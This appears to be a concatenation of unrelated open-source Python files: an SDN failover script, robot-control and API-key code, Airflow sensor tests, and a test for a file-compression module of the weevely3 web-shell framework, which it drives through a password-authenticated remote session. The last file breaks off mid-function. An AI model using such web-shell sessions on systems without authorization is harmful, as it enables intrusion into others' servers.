print 'Using %s modules' % shooter.module
shooter(path)
print path
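# Hedged usage sketch (not part of the original library): taking a screenshot
# programmatically with ScreenshotTaker, assuming one of the supported modules
# (wx, PyGTK, PIL, or the JVM/.NET APIs) and a display are available. The
# output path below is illustrative only; this helper is never called here.
def _example_take_screenshot(path='/tmp/example.jpg'):
    taker = ScreenshotTaker()      # picks the first available screenshot module
    if not taker:                  # falsy when no screenshot module is found
        raise RuntimeError('No screenshot module available')
    taker(path)                    # __call__ writes a JPEG to the given path
    return path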
|
eric-stanley/robotframework
|
src/robot/libraries/Screenshot.py
|
Python
|
apache-2.0
| 13,020
| 0.000998
|
#!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import time
import os
import subprocess
import csv
import StringIO
import iptc
HOSTS = 3
p1_log = open('logs-example/log.p1.txt', 'w')
p2_log = open('logs-example/log.p2.txt', 'w')
def closePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.insert_rule(rule)
def unClosePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.delete_rule(rule)
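# Hedged sketch (not part of the original script): a context manager pairing
# closePort/unClosePort so the iptables DROP rule is always removed, even if
# the failover experiment raises. It is not wired into myNet() below.
from contextlib import contextmanager

@contextmanager
def port_closed(port):
    closePort(port)          # insert DROP rule for the controller port
    try:
        yield
    finally:
        unClosePort(port)    # remove the rule again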
def myNet():
global p1
global p2
global p3
global p4
cPort1=6666
cPort2=6667
hosts=[]
kill = 0
net = Mininet( topo=None, build=False, autoSetMacs=True)
con1 = net.addController( 'c0', controller=RemoteController, ip='127.0.0.1', port=cPort1)
con2 = net.addController( 'c1', controller=RemoteController, ip='127.0.0.1', port=cPort2)
for x in range(0, HOSTS):
hostname = "h%d" %(x)
switchname = "s%d" %(x)
host = net.addHost(hostname)
switch = net.addSwitch(switchname)
if (x!=0):
net.addLink(switch, lastswitch)
lastswitch = switch
net.addLink(host,switch)
net.build()
switch.start([con1,con2])
hosts.append(host)
net.start()
tping = time.time()
print 'h0 ping : %.10f' % tping
hosts[0].cmdPrint('hping3 -c 200 -i u20000 ',hosts[1].IP(),' > logs-example/log.ping12.txt 2>&1 &')
#20ms every ping * 200 -> 4s
while True:
tcur = time.time()
if tcur - tping > 2: # after 2s running
# print 'SET ROLE C1 SLAVE '
# p1.stdin.write("import pox.openflow.nicira as nx\n")
# p1.stdin.write("for connection in core.openflow.connections:\n")
# p1.stdin.write("\tconnection.send(nx.nx_role_request(slave='true'))\n")
# p1.stdin.write('\n')
print 'close port %i in %.10f' %(cPort1,tcur)
closePort(cPort1)
break
print 'START C2 AS MASTER at %.10f' %time.time()
p2 = subprocess.Popen(['pox/pox.py',"master67"],stdin=subprocess.PIPE, stdout=p2_log,stderr=p2_log,preexec_fn=os.setpgrp)
while True:
p = subprocess.Popen(["ovs-vsctl", "-f", "csv", "list", "controller"], stdout=subprocess.PIPE)
output, err = p.communicate()
f = StringIO.StringIO(output)
reader = csv.reader(f, delimiter=',')
rownum = 0
con66 = [] # not using this for now
con67 = []
for row in reader:
uuid = row[0]
target = row[15]
role = row[13]
i = target.find(str(cPort2))
if i != -1:
if (role == 'master'):
con67.append(uuid)
f.close()
if len(con67) == HOSTS:
uptime = time.time()
print 'new master ready at %.10f' %uptime
break
print 'now wait for hping3 to finish..'
hosts[0].cmdPrint('wait %hping3')
print 'hping3 finished at %.10f' %time.time()
print 'open the port..'
unClosePort(cPort1)
print 'stopping mininet'
net.stop()
print 'stopping pox(s)..'
p1.terminate()
p2.terminate()
print 'timestamp difference %.10f' %(uptime-tcur)
if __name__ == '__main__':
setLogLevel( 'info' )
p1 = subprocess.Popen(['pox/pox.py', "master66"],stdin=subprocess.PIPE, stdout=p1_log,stderr=p1_log,preexec_fn=os.setpgrp)
print 'c1 runs, master'
print 'wait for 3 seconds...'
time.sleep(3)
myNet()
print 'close pox logs..'
p1_log.close()
p2_log.close()
print 'bye'
# t.process.terminate()
|
ardhipoetra/SDN-workbench
|
sch3.py
|
Python
|
gpl-2.0
| 3,578
| 0.044159
|
'''
Created on 31st October, 2012
@author: Don Najd
'''
import logging
from naoutil.naoenv import NaoEnvironment, make_environment
from fluentnao.core.arms import Arms
from fluentnao.core.elbows import Elbows
from fluentnao.core.feet import Feet
from fluentnao.core.hands import Hands
from fluentnao.core.head import Head
from fluentnao.core.joints import Joints
from fluentnao.core.legs import Legs
from fluentnao.core.wrists import Wrists
from fluentnao.core.leds import Leds
from fluentnao.core.audio import Audio
from fluentnao.core.naoscript import NaoScript
import almath
import math
import time
from datetime import datetime, timedelta
class Nao(object):
# init method
def __init__(self, env, log_function=None):
super(Nao, self).__init__()
# jobs for threading
self.jobs = []
# set motion proxy & log
self.env = env
self.log_function = log_function
if not log_function:
self.logger = logging.getLogger("fluentnao.nao.Nao")
# joints
self.joints = Joints()
self.chains = self.joints.Chains
# other
self.naoscript = NaoScript(self)
self.leds = Leds(self)
self.audio = Audio(self)
# head
self.head = Head(self)
# arms
self.hands = Hands(self)
self.wrists = Wrists(self, self.hands)
self.elbows = Elbows(self, self.wrists, self.hands)
self.arms = Arms(self, self.elbows, self.wrists, self.hands)
# legs
self.feet = Feet(self)
self.legs = Legs(self, self.feet)
# global duration
self.set_duration(1.5)
def log(self, msg):
if (self.log_function):
self.log_function(str(datetime.now()) + "|" + msg)
else:
self.logger.debug(str(datetime.now()) + "|" + msg)
###################################
# text to speech
###################################
def say(self, text):
self.env.tts.post.say(text)
return self;
def say_and_block(self, text):
self.env.tts.say(text)
return self;
def wait(self, seconds):
time.sleep(seconds)
return self;
###################################
# Postures
###################################
def stand_init(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandInit", speed))
taskId = self.env.robotPosture.post.goToPosture("StandInit", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit_relax(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("SitRelax", speed))
taskId = self.env.robotPosture.post.goToPosture("SitRelax", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand_zero(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandZero", speed))
taskId = self.env.robotPosture.post.goToPosture("StandZero", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_belly(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBelly", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBelly", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_back(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBack", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBack", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Stand", speed))
self.env.robotPosture.goToPosture("Stand", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
def crouch(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Crouch", speed))
taskId = self.env.robotPosture.post.goToPosture("Crouch", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Sit", speed))
self.env.robotPosture.post.goToPosture("Sit", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
###################################
# stiffness
###################################
def stiff(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 1.0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
def rest(self):
self.env.motion.rest()
return self;
def relax(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
###################################
# Whole Body Motion & Balance
###################################
def whole_body_disable(self):
self.log("wbDisable")
isEnabled = False
self.env.motion.wbEnable(isEnabled)
def whole_body_enable(self):
self.log("wbEnable")
isEnabled = True
self.env.motion.wbEnable(isEnabled)
def foot_state(self, supportLeg="Legs", stateName="Fixed"):
# Legs are constrained fixed
# supportLeg: Legs, LLeg or RLeg
# stateName: Fixed, Plane or Free
self.log("supportLeg=%s|stateName=%s" % (supportLeg, stateName))
self.env.motion.wbFootState(stateName, supportLeg)
def constrain_motion(self, supportLeg="Legs"):
# Constraint Balance Motion / Support Polygon
# supportLeg: Legs, LLeg or RLeg
isEnable = True
self.env.motion.wbEnableBalanceConstraint(isEnable, supportLeg)
def balance(self, leg, duration):
duration = self.determine_duration(duration)
# stiffen body
self.stiff()
        self.whole_body_enable()

self.foot_state()
self.constrain_motion()
# Com go to LLeg
supportLeg = leg
self.env.motion.wbGoToBalance(supportLeg, duration)
self.whole_body_disable()
###################################
# Duration
###################################
def set_duration(self, durationInSeconds):
self.globalDuration = durationInSeconds
return self;
def determine_duration(self, durationInSeconds):
if durationInSeconds > 0:
return durationInSeconds
return self.globalDuration
###################################
# blocking
###################################
def go(self):
for taskId in self.jobs:
self.log("taskId=%s|action=wait" % (taskId))
d1 = datetime.now()
self.env.motion.wait(taskId, 8000)
d2 = datetime.now()
r = d2 - d1
self.log("taskId=%s|action=done|seconds=%s" % (taskId, r.total_seconds()))
self.jobs[:] = []
self.log("done")
return self
###################################
# movement
###################################
def move(self, chain, angleListInRadians, timeListInSeconds):
# motion w/ blocking call
taskId = self.env.motion.post.angleInterpolation(chain, angleListInRadians, timeListInSeconds, True)
# log
self.log("|taskId=%s|chain=%s|angleList=%s" % (taskId, chain, angleListInRadians))
self.jobs.append(taskId)
def move_with_degrees_and_duration(self, jointName, angleInDegrees, durationInSeconds):
# convert to radians
angleInRadians = angleInDegrees * almath.TO_RAD
# move
self.move(jointName, [angleInRadians], durationInSeconds)
###################################
# helpers
###################################
def get_target_angles_for_chain(self, chain, angle):
# Get the Number of Joints
numBodies = len(self.env.motion.getJointNames(chain))
# We prepare a collection of floats
return [angle] * numBodies
def get_max_degrees_per_second(self, jointName):
limits = self.env.motion.getLimits(jointName);
minAngle = limits[0][0]
maxAngle = limits[0][1]
maxChange = limits[0][2] # in rad.s-1
#self.log("maxChange: " + str(maxChange) + " for " + jointName)
return math.degrees(maxChange)
def get_fraction_max_speed(self, jointName, desiredPositionInDegrees, executionTimeInSeconds):
# current position in degrees
useSensors = False;
currentPositionInDegrees = math.degrees(self.env.motion.getAngles(jointName, useSensors)[0]);
#self.log("pos in deg: " + str(currentPositionInDegrees))
# distance
distanceInDegrees = abs(currentPositionInDegrees - desiredPositionInDegrees)
#self.log("distance: " + str(distanceInDegrees))
# max speed
maxDegreesPerSecond = self.get_max_degrees_per_second(jointName)
# fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
if fractionOfMaxSpeed > maxDegreesPerSecond:
return maxDegreesPerSecond
return fractionOfMaxSpeed
###################################
# development
###################################
def init_modules_for_development(pathToCore):
import sys
sys.path.append(pathToCore)
import fluentnao.core.arms
import fluentnao.core.elbows
import fluentnao.core.feet
import fluentnao.core.hands
import fluentnao.core.head
import fluentnao.core.joints
import fluentnao.core.legs
import fluentnao.core.wrists
import fluentnao.core.leds
import fluentnao.core.audio
import fluentnao.core.naoscript
reload(fluentnao.core.arms)
reload(fluentnao.core.joints)
reload(fluentnao.core.hands)
reload(fluentnao.core.elbows)
reload(fluentnao.core.wrists)
reload(fluentnao.core.legs)
reload(fluentnao.core.head)
reload(fluentnao.core.feet)
reload(fluentnao.core.leds)
reload(fluentnao.core.audio)
reload(fluentnao.core.naoscript)
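# Hedged usage sketch (not part of the original module): the fluent call style
# this class is built for. `env` is assumed to be a NaoEnvironment created
# elsewhere (e.g. via make_environment); this helper is never called here.
def _example_fluent_session(env):
    nao = Nao(env)
    nao.stiff().stand_init().say("hello")
    nao.wait(2).sit().relax()
    return nao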
|
davesnowdon/nao-recorder
|
src/main/python/fluentnao/nao.py
|
Python
|
gpl-2.0
| 10,366
| 0.006946
|
import binascii
import os
import random
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
from aesfield.field import AESField
from olympia.amo.fields import PositiveAutoField
from olympia.amo.models import ModelBase
from olympia.users.models import UserProfile
# These are identifiers for the type of API keys that can be stored
# in our database.
SYMMETRIC_JWT_TYPE = 1
API_KEY_TYPES = [
SYMMETRIC_JWT_TYPE,
]
@python_2_unicode_compatible
class APIKey(ModelBase):
"""
A developer's key/secret pair to access the API.
"""
id = PositiveAutoField(primary_key=True)
user = models.ForeignKey(UserProfile, related_name='api_keys')
# A user can only have one active key at the same time, it's enforced by
# a unique db constraint. Since we keep old inactive keys though, nulls
# need to be allowed (and we need to always set is_active=None instead of
# is_active=False when revoking keys).
is_active = models.NullBooleanField(default=True)
type = models.PositiveIntegerField(
choices=dict(zip(API_KEY_TYPES, API_KEY_TYPES)).items(), default=0)
key = models.CharField(max_length=255, db_index=True, unique=True)
# TODO: use RSA public keys instead? If we were to use JWT RSA keys
# then we'd only need to store the public key.
secret = AESField(aes_key='api_key:secret', aes_prefix=b'aes:')
class Meta:
db_table = 'api_key'
unique_together = (('user', 'is_active'),)
def __str__(self):
return (
u'<{cls} user={user}, type={type}, key={key} secret=...>'
.format(cls=self.__class__.__name__, key=self.key,
type=self.type, user=self.user))
@classmethod
def get_jwt_key(cls, **kwargs):
"""
Return a single active APIKey instance for a given user or key.
"""
kwargs['is_active'] = True
return cls.objects.get(type=SYMMETRIC_JWT_TYPE, **kwargs)
@classmethod
def new_jwt_credentials(cls, user):
"""
Generates a new key/secret pair suitable for symmetric JWT signing.
This method must be run within a db transaction.
Returns an instance of APIKey.
"""
key = cls.get_unique_key('user:{}:'.format(user.pk))
return cls.objects.create(
key=key, secret=cls.generate_secret(32),
type=SYMMETRIC_JWT_TYPE, user=user, is_active=True)
@classmethod
def get_unique_key(cls, prefix, try_count=1, max_tries=1000):
if try_count >= max_tries:
raise RuntimeError(
'a unique API key could not be found after {} tries'
.format(max_tries))
key = '{}{}'.format(prefix, random.randint(0, 999))
if cls.objects.filter(key=key).exists():
return cls.get_unique_key(prefix, try_count=try_count + 1,
max_tries=max_tries)
return key
@staticmethod
def generate_secret(byte_length):
"""
Return a true random ascii string containing byte_length of randomness.
The resulting key is suitable for cryptography.
The key will be hex encoded which means it will be twice as long
as byte_length, i.e. 40 random bytes yields an 80 byte string.
byte_length must be at least 32.
"""
if byte_length < 32: # at least 256 bit
raise ValueError(
'{} is too short; secrets must be longer than 32 bytes'
.format(byte_length))
return force_text(binascii.b2a_hex(os.urandom(byte_length)))
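# Hedged sketch (not part of the original module): issuing credentials for a
# user. new_jwt_credentials() must run inside a database transaction, so a
# caller would typically wrap it as below; `user` is a saved UserProfile.
def issue_jwt_credentials(user):
    from django.db import transaction

    with transaction.atomic():
        return APIKey.new_jwt_credentials(user)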
|
aviarypl/mozilla-l10n-addons-server
|
src/olympia/api/models.py
|
Python
|
bsd-3-clause
| 3,638
| 0
|
from tests.base_test import BaseTest
from tests import config
from core import modules
from core.sessions import SessionURL
from testfixtures import log_capture
from core import messages
import logging
import os
import subprocess
class FileBzip(BaseTest):
# Create and bzip2 binary files for the test
binstring = [
b'\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1',
b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00'
]
uncompressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1')
]
compressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0.bz2'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1.bz2')
]
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
subprocess.check_output("""
BASE_FOLDER="{config.base_folder}/test_file_bzip2/"
rm -rf "$BASE_FOLDER"
mkdir -p "$BASE_FOLDER/"
echo -n '\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1' > "$BASE_FOLDER/binfile0"
echo -n '\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00' > "$BASE_FOLDER/binfile1"
bzip2 "$BASE_FOLDER/binfile0"
bzip2 "$BASE_FOLDER/binfile1"
chown www-data: -R "$BASE_FOLDER/"
""".format(
config = config
), shell=True)
self.run_argv = modules.loaded['file_bzip2'].run_argv
def test_compress_decompress(self):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[0]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Recompress it keeping the original file
self.assertTrue(self.run_argv([self.uncompressed[0], '--keep']))
        # Check the existence of the original file and remove it
subprocess.check_call('stat -c %%a "%s"' % self.uncompressed[0], shell=True)
subprocess.check_call('rm "%s"' % self.uncompressed[0], shell=True)
#Do the same check
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
def test_compress_decompress_multiple(self):
for index in range(0, len(self.compressed)):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[index]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
@log_capture()
def test_already_exists(self, log_captured):
# Decompress keeping it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0], '--keep']));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Do it again and trigger that the file decompressed already exists
self.assertIsNone(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping decompressing" % self.uncompressed[0])
# Compress and trigger that the file compressed already exists
self.assertIsNone(self.run_argv([self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping compressing" % self.compressed[0])
@log_capture()
def test_wrong_ext(self, log_captured):
# Decompress it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Decompress the decompressed, wrong ext
self.assertIsNone(self.run_argv(["--decompress", self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"Unknown suffix, skipping decompressing")
@log_capture()
def test_unexistant(self, log_captured):
# Decompress it and check test file
self.assertIsNone(self.run_argv(["--decompress", 'bogus']));
self.assertEqual(log_captured.records[-1].msg,
"Skipping file '%s', check existance and permission" % 'bogus')
|
epinna/weevely3
|
tests/test_file_bzip2.py
|
Python
|
gpl-3.0
| 5,554
| 0.009903
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import datetime
import importlib
import warnings
import django
import six
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import render
from django.urls import reverse
from karaage.common.forms import CommentForm
from karaage.common.models import ADDITION, CHANGE, COMMENT, DELETION, LogEntry
from karaage.middleware.threadlocals import get_current_user
from karaage.plugins import BasePlugin
def get_date_range(request, default_start=None, default_end=None):
if default_start is None:
default_start = datetime.date.today() - datetime.timedelta(days=90)
if default_end is None:
default_end = datetime.date.today()
today = datetime.date.today()
if 'start' in request.GET:
try:
years, months, days = request.GET['start'].split('-')
start = datetime.datetime(int(years), int(months), int(days))
start = start.date()
except ValueError:
start = today - datetime.timedelta(days=90)
else:
start = default_start
if 'end' in request.GET:
try:
years, months, days = request.GET['end'].split('-')
end = datetime.datetime(int(years), int(months), int(days))
end = end.date()
except ValueError:
end = today
else:
end = default_end
return start, end
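# Hedged example (not part of the original module): get_date_range only reads
# request.GET, so it can be exercised with Django's RequestFactory. The URL
# and dates below are illustrative only; this helper is never called here.
def _example_date_range():
    from django.test import RequestFactory

    request = RequestFactory().get(
        '/usage/', {'start': '2017-01-01', 'end': '2017-03-31'})
    return get_date_range(request)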
def get_current_person():
user = get_current_user()
if user is None:
return None
if not user.is_authenticated:
return None
return user
class log():
def __init__(self, user, obj, flag, message):
warnings.warn("Calling karaage.common.log directly has been"
" deprecated. You should use the API "
"log.(add|change|field_change|delete|comment)",
DeprecationWarning)
LogEntry.objects.log_object(obj, flag, message, user)
@classmethod
def add(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, ADDITION, message, user)
@classmethod
def change(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, CHANGE, message, user)
@classmethod
def field_change(cls, obj, user=None, field=None, new_value=None):
return LogEntry.objects.log_object(
obj, CHANGE, 'Changed %s to %s' % (field, new_value), user)
@classmethod
def delete(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, DELETION, message, user)
@classmethod
def comment(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, COMMENT, message, user)
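# Hedged usage note (illustrative object/message names only): callers are
# expected to use the classmethod API rather than instantiating log() directly,
# e.g. log.change(project, 'Renamed project') or log.comment(person, 'Approved').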
def new_random_token():
import random
from hashlib import sha1
# Use the system (hardware-based) random number generator if it exists.
if hasattr(random, 'SystemRandom'):
randrange = random.SystemRandom().randrange
else:
randrange = random.randrange
max_key = 18446744073709551616 # 2 << 63
string = six.u("%s%s") % (randrange(0, max_key), settings.SECRET_KEY)
return sha1(string.encode("ascii")).hexdigest()
def log_list(request, breadcrumbs, obj):
result = QueryDict("", mutable=True)
result['content_type'] = ContentType.objects.get_for_model(obj).pk
result['object_id'] = obj.pk
url = reverse('kg_log_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
def add_comment(request, breadcrumbs, obj):
assert obj is not None
assert obj.pk is not None
form = CommentForm(
data=request.POST or None, obj=obj,
request=request, instance=None)
if request.method == 'POST':
form.save()
return HttpResponseRedirect(obj.get_absolute_url())
return render(
template_name='karaage/common/add_comment.html',
context={
'form': form, 'obj': obj,
'breadcrumbs': breadcrumbs,
},
request=request)
def is_admin(request):
if settings.ADMIN_IGNORED:
return False
if not request.user.is_authenticated:
return False
return request.user.is_admin
def get_app_modules(name):
if django.VERSION < (1, 7):
for app in settings.INSTALLED_APPS:
try:
module_name = app + "." + name
module = importlib.import_module(module_name)
yield module
except ImportError:
pass
else:
from django.apps import apps
for config in apps.get_app_configs():
if isinstance(config, BasePlugin):
module_name = config.name + "." + name
module = importlib.import_module(module_name)
yield module
def get_urls(name):
for module in get_app_modules("urls"):
urls = getattr(module, name, None)
if urls is not None:
yield urls
|
Karaage-Cluster/karaage
|
karaage/common/__init__.py
|
Python
|
gpl-3.0
| 5,700
| 0
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from datetime import time, timedelta
import pytest
from airflow import exceptions, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout
from airflow.models import DagBag, DagRun, TaskInstance
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskMarker, ExternalTaskSensor
from airflow.sensors.time_sensor import TimeSensor
from airflow.serialization.serialized_objects import SerializedBaseOperator
from airflow.utils.session import provide_session
from airflow.utils.state import DagRunState, State, TaskInstanceState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_test_dag'
TEST_TASK_ID = 'time_sensor_check'
TEST_TASK_ID_ALTERNATE = 'time_sensor_check_alternate'
DEV_NULL = '/dev/null'
@pytest.fixture(autouse=True)
def clean_db():
clear_db_runs()
class TestExternalTaskSensor(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
def test_time_sensor(self, task_id=TEST_TASK_ID):
op = TimeSensor(task_id=task_id, target_time=time(0), dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_multiple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_catch_overlap_allowed_failed_state(self):
with pytest.raises(AirflowException):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=[State.SUCCESS],
failed_states=[State.SUCCESS],
dag=self.dag,
)
def test_external_task_sensor_wrong_failed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["invalid_state"],
dag=self.dag,
)
def test_external_task_sensor_failed_states(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["failed"],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_failed_states_as_success(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks [\'time_sensor_check\']'
' in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check'] in DAG "
"unit_test_dag failed."
)
def test_external_task_sensor_failed_states_as_success_mulitple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks '
'[\'time_sensor_check\', \'time_sensor_check_alternate\'] '
'in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check', 'time_sensor_check_alternate'] in DAG "
"unit_test_dag failed."
)
def test_external_dag_sensor(self):
other_dag = DAG('other_dag', default_args=self.args, end_date=DEFAULT_DATE, schedule_interval='@once')
other_dag.create_dagrun(
run_id='test', start_date=DEFAULT_DATE, execution_date=DEFAULT_DATE, state=State.SUCCESS
)
op = ExternalTaskSensor(
task_id='test_external_dag_sensor_check',
external_dag_id='other_dag',
external_task_id=None,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_execution_dates(self):
